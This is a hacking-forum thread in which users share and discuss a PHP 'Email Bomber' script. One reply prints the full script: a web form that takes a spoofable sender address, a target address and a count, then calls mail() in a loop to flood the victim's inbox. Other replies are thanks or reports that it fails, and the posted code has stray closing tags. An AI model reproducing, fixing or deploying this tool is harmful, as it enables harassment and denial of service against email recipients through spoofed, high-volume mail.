ALERT!
Click here to register with a few steps and explore all our cool stuff we have to offer!

Jump to content



Photo

Email Bomber Php Script


  • Please log in to reply
Email Bomber Php Script

#1

Mythical0Beast
Mythical0Beast
    Offline
    100
    Rep
    196
    Likes

    ---BUSINESS---

Posts: 1225
Threads: 153
Joined: Oct 14, 2015
Credits: 0

Eight years registered
#1

Enjoy this php/ Html email Bomber script

 

Hidden Content
You'll be able to see the hidden content once you reply to this topic or upgrade your account.


  • 2

#2

pruned_78124355
pruned_78124355
    Offline
    0
    Rep
    0
    Likes

    Saiko

  • PipPip
Posts: 20
Threads: 0
Joined: Sep 18, 2017
Credits: 0
Six years registered
#2

ty


  • 0

#3

pruned_73903238
pruned_73903238
    Offline
    0
    Rep
    0
    Likes

    Advanced Member

  • PipPipPipPip
Posts: 115
Threads: 7
Joined: Sep 05, 2017
Credits: 0
Six years registered
#3

Does it works?

 

It does not work.You should write the code putting a  ?> before line 51 since you continue to write HTML code after not closing PHP tag.

 

So the correct code is this : 

<?php
        print "<title>Email Bomber </title>";
        print "<body text='red' bgcolor='black'>";
        print "<center>";
        print "<b><h2> e-Mail Bomber</b></h2>";  
        print "<form action=".$_SERVER['PHP_SELF']." method='post'>";
        print "From:<br>";
        print "<input type='text' name='from' size='30' value='from@Domain.com'><br>";
        print "To:<br>";
        print "<input type='text' name='to' size='30' value='to@Domain.com'><br>";
        print "Amount:<br>";
        print "<input type='text' name='amount' size='3' maxlength='3' value='100'><br>";
        print "Subject:<br>";
        print "<input type='text' name='subject' size='30'><br>";
        print "Body (html format):<br>";
        print "<textarea name='body' rows='8' cols='35'></textarea><br><br>";
        print "<input type='submit' name='submit' value='submit'><br>";
        print "</form>";
     
        print "<br>";
        if (isset($_POST['submit']))
        {
           echo " ";
            $mail_from=$_POST["from"];
            $mail_to=$_POST["to"];
            $times = $_REQUEST['amount'];
           if(!is_numeric($times)) {echo "Invalid value for 'Amount'.<br><a href='javascript:history.go(-1)'>back</a>";exit;}
            $mail_subject=$_POST["subject"];
            $mail_body=$_POST["body"];
            $mail_headers=implode("\n",array("From: $mail_from","Subject: $mail_subject","Return-Path: $mail_from","MIME-Version: 1.0?","X-Priority: 3","Content-Type: text/html" ));
           //header("Content-Type: text/plain");
        $count = 1;
        while($count <= $times) {
            $status=mail($mail_to,$mail_subject,$mail_body,$mail_headers);
        ++$count;
        }
        if($status)
            {
                echo "<b>Sent !<b><br><br>";
            }
            else
            {
                echo "Failed<br><br>";
            }
     
            //exit;
        }
        //include("xvk98.php");
        print "</center></body>";
        //redsm0ke tampan :v
?>
     <center><b><h1>Copyright Mythical0Beast</h1></b1></center>
     
        ?>
    <br>
    <br>
    <br>
    <br>
    <br>
    <center><?php
     
    ?></center>

Anyway I tested on Yahoo and it is not working 


Edited by Huanho, 18 September 2017 - 06:44 PM.

  • 0

#4

pruned_90377351
pruned_90377351
    Offline
    0
    Rep
    -1
    Likes

    Member

  • PipPipPip
Posts: 67
Threads: 0
Joined: Aug 22, 2017
Credits: 0
Six years registered
#4

what does this even do.


  • 0

#5

pruned_82741112
pruned_82741112
    Offline
    0
    Rep
    2
    Likes

    Member

  • PipPipPip
Posts: 49
Threads: 0
Joined: Oct 12, 2016
Credits: 0
Seven years registered
#5

ty


  • 0

#6

SerkanCreative
SerkanCreative
    Offline
    0
    Rep
    0
    Likes

    Member

  • PipPipPip
Posts: 53
Threads: 1
Joined: Dec 08, 2016
Credits: 0
Seven years registered
#6

not working.

 


  • 0

#7

SerkanCreative
SerkanCreative
    Offline
    0
    Rep
    0
    Likes

    Member

  • PipPipPip
Posts: 53
Threads: 1
Joined: Dec 08, 2016
Credits: 0
Seven years registered
#7

RqFVeJtWTfiFUnAuXiUi1Q.png


  • 0

#8

pruned_82706037
pruned_82706037
    Offline
    -1
    Rep
    0
    Likes

    Member

  • PipPipPip
Posts: 33
Threads: 1
Joined: May 14, 2017
Credits: 0
Six years registered
#8

hi guys i like thi topic bru

 


  • 0

#9

pruned_69991791
pruned_69991791
    Offline
    0
    Rep
    1
    Likes

    Member

  • PipPipPip
Posts: 34
Threads: 0
Joined: Sep 21, 2017
Credits: 0
Six years registered
#9

ty gays


  • 0

#10

nahboi
nahboi
    Offline
    0
    Rep
    0
    Likes

    New Member

Posts: 14
Threads: 0
Joined: Sep 23, 2017
Credits: 0
Six years registered
#10

thanks!


  • 0


 Users browsing this thread: